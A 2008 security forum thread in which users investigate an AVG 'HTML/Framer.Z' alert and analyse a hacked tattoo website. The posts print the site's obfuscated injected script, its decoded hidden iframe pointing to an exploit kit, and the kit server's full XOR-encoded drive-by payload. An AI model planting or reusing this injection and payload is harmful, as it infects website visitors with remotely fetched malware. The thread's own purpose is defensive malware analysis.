 Sarah
join:2001-01-09
New York, NY |
Sarah
2008-Mar-31 8:34 am
Question about HTML/Framer.ZA website I frequent has been sending up flags that AVG has found "HTML/Framer.Z" upon loading the main web page. Talking to some other forum members (via e-mail since the forum is down now) it seems that everyone running AVG has seen this but someone running Norton finds nothing. No one seems to be seeing any kind of active infection; AVG is just flagging the cached pages from the infected site. After a full scan it did not find any other infected files.
I can find very little information about this particular problem and I'm wondering if anyone here can enlighten me? Should my friend with Norton be worried or is this something along the lines of a FP/overreaction with AVG? I'm thinking this may be a more common virus that AVG is just naming differently than everyone else but I don't know what exactly I need to be looking for. Google searches just reveal questions like mine ("I'm seeing this pop up, what should I do") and no real info about the virus in question. |
|
| |
i have seen times when "antivir" would flag some webpages just because someone had posted some "code" in one of the posts.. maybe avg is, similarly, flagging something like that? |
|
|
Sarah
join:2001-01-09
New York, NY |
Sarah
2008-Mar-31 9:22 am
It was flagging the page with the forum list on it (basically its version of this page: » /forums/all) which is also the main page of the forum... so I don't think it could be anything that was posted by a user. I should add, if it matters, the page looked like it had been altered since there were error messages in it and people could not log in... |
|
| |
FYI.. only if the page contains a working exploit for your OS/patch level will Norton actually trigger on it. Its hard to say if its an FP without the URL. If you can PM me the URL I can take a look. |
|
Sarah
join:2001-01-09
New York, NY |
Sarah
2008-Mar-31 12:01 pm
The page is gone now so there's nothing left to look at... he just tacked up a placeholder message saying it will be back up soon when he fixes it.
But that is good info re: Norton, I know my friend was using a recent version of Firefox so it's probably less likely to be vulnerable. |
|
1 edit |
Zendiver to Sarah
Anon
2008-Mar-31 4:55 pm
to Sarah
I have been on vacation and just found out that my site is starting to do this as well.
[link removed] |
|
 sashwa
Mod
join:2001-01-29
Alcatraz
1 recommendation |
to Sarah
Do not click the above link. |
|
| |
DocHoliday to zteardrop
Anon
2008-Apr-3 9:25 am
to zteardrop
I get the same virus notice from my AVG. I googled Tiger Jimmy tattoos. When at the site, i got the same message 3 times. AVG said it healed the virus. It did come up after running AVG. |
|
1 recommendation |
to zteardrop
quote:
only if the page contains a working exploit for your OS/patch level will Norton actually trigger on it
Not necessarily. AVs including Norton also trigger on encoded JavaScript snippets which end up document.write()ing redirections to exploits, regardless of whether the exploit at the end is actually reached. Occasionally this produces false positives with other encoded JavaScripts, but generally speaking obfuscated JavaScript is usually a sign that something dodgy is up. Trying to come to a conclusion about whether a site is really hacked or not from the responses of popular AVs is a pointless task, as well as likely to get you infected. If you want to really know what's going on, you have to look at the code. It's not that hard and it's much more productive than arguing over which AV is the more canonical (tip: none of them are really that reliable). So given the above post, we can guess the place to look is view-source:hxxp://tigerjimmytattoo.com/. Immediately obvious at the bottom of that is: {script}eval(unescape("%77%69%6e%64%6f%77%2e... Code like this is an immediate big red flag. Anyhow, should we try unescape()ing this manually, we find it writes out an iframe tag pointing to a 'gpack' exploit kit at 58.65.232.33, a server at known Russian-related malware host HostFresh. Currently the URL leads only to a 404, so it's not quite true to say the site is infected *right now*, but it's definitely been hacked and there probably have been/will be exploits from there at other times. |
|
| |
to zteardrop
AVG 7.5 free addition is alerting to HTML/Framer.Z on this site: www.pci-golf.com. |
|
 your moderator at work
 hidden :
|
 foxsteve
Premium Member
join:2001-12-28
Campbell, CA
4 edits |
foxsteve
Premium Member
2008-Apr-5 6:21 pm
Re: Question about HTML/Framer.ZThat sequence (%77%69%6e%64%6f%77%2e...) may be decoded as here window.status='Done';document.write('<iframe name=a0a5a src=\'http://58.65.232.33/gpack/index.php?'+Math.round(Math.random()*43280)+'8b6\' width=541 height=80 style=\'display: none\'></iframe>')
Only one website was found with this IP 58.65.232.33, however this website was not related to any domain name. Additional information.This IP is allocated to APNIC (Asia Pacific Network Information Centre) Address: PO Box 2131 City: Milton StateProv: QLD PostalCode: 4064 Country: AU inetnum: 58.65.232.0 - 58.65.239.255 netname: HOSTFRESH descr: Internet Service Provider status: ALLOCATED PORTABLE person: Piu Lo nic-hdl: PL466-AP e-mail: ipadmin@hostfresh.com address: No. 500, Post Office, Tuen Mun, N.T., Hong Kong phone: +852-35979788 fax-no: +852-24522539 country: HK WEB site is active and here is a result of calling that URL http://58.65.232.33/gpack/index.php Requesting http://58.65.232.33/gpack/index.php .. Ok
Reply received (reply time: 484 ms)
-----------------------------------
HTTP/1.1 200 OK
Date: Sat, 05 Apr 2008 22:36:58 GMT
Server: Apache/2.2.6 (Fedora)
X-Powered-By: PHP/5.1.6
Content-Length: 942
Connection: close
Content-Type: text/html
<html><head><meta HTTP-EQUIV="REFRESH" content="3; URL=index.php?404"><script language=JavaScript>str = "ru`su)(:gtobuhno!ru`su)(!zw`s!fgg!<!enbtldou/bsd`udDmdldou)&nckdbu&(:fgg/rdu@uushctud)&he&-&fgg&(:fgg/rdu@uushctud)&bm`rrhe&-&bm&*&rh&*#e;CE#*#87B4#*&47,74@2,0&*#0E1,89#*&2@,11&*#B15#*&GB3&*#8D#*&27&(:usx!zw`s!p!<!fgg/Bsd`udNckdbu)&lr&*#yl#*&m3&*#/#*&YL&*#MI#*&U&*&UQ&-&&(:w`s!r!<!fgg/Bsd`udNckdbu)#Ridm#*#m/@q#*#qm#*#hb`uh#*#no#-&&(:w`s!u!<!fgg/Bsd`udNckdbu)&`e&*&ne&*#c/#*&ru&*#sd#*&`l&-&&(:usx!z!u/uxqd!<!0:p/nqdo)&F&*#D#*&U&-&iuuq;..49/74/323/22.fq`bj.mn`e/qiq&-g`mrd(:p/rdoe)(:!u/nqdo)(:u/Vshud)p/sdrqnordCnex(:w`s!o`ld!<!&/..//..hdyqmnsds/dyd&:u/R`wdUnGhmd)o`ld-3(:u/Bmnrd)(:|!b`ubi)d(!z|usx!z!r/ridmmdydbtud)o`ld(:!|!b`ubi)d(!z||b`ubi)d(z||";str2 = "";for (i = 0; i < str.length; i ++) { str2 = str2 + String.fromCharCode (str.charCodeAt (i) ^ 1); }; eval (str2);</script></head></html>
PS. For bobince  As you see that server is located in Hong-Kong and it is not Russia. :) |
|
| |
quote:
As you see that server is located in Hong-Kong and it is not Russia
True, that's where it's hosted, but the operators of the server are almost certainly members of Russian-language malware community and not residents of HK. HostFresh is a black-hat provider of dedicated servers catering primarily to the Russians. It was previously housed alongside another major black-hat ISP, Esthost, in the Atrivo/Intercage Netblock of Hell. |
|
foxsteve
Premium Member
join:2001-12-28
Campbell, CA
1 edit |
foxsteve
Premium Member
2008-Apr-6 1:08 pm
If this is information from Piu Lo  nic-hdl: PL466-AP
e-mail: ipadmin@hostfresh.com
address: No. 500, Post Office, Tuen Mun, N.T., Hong Kong
phone: +852-35979788
fax-no: +852-24522539
.... >tracert 58.65.232.33 Tracing route to oracle.dmain.name [58.65.232.33] over a maximum of 30 hops: ............... 8 126 ms 127 ms 127 ms po12- 0.cr2.nrt1.asianetcom.net [202.147.50.146] 9 183 ms 185 ms 183 ms gi6-2.cr1.hkg3.asianetcom.net [202.147.16.93] 10 190 ms 188 ms 190 ms po15-0.gw2.hkg3.asianetcom.net [202.147.16.210] 11 187 ms 186 ms 187 ms HFI-0002.gw2.hkg3.asianetcom.net [202.147.17.90] 12 187 ms 186 ms 187 ms 58.65.235.230 13 186 ms 187 ms 187 ms 116.50.12.10 14 182 ms 183 ms 184 ms oracle.dmain.name [58.65.232.33] |
|
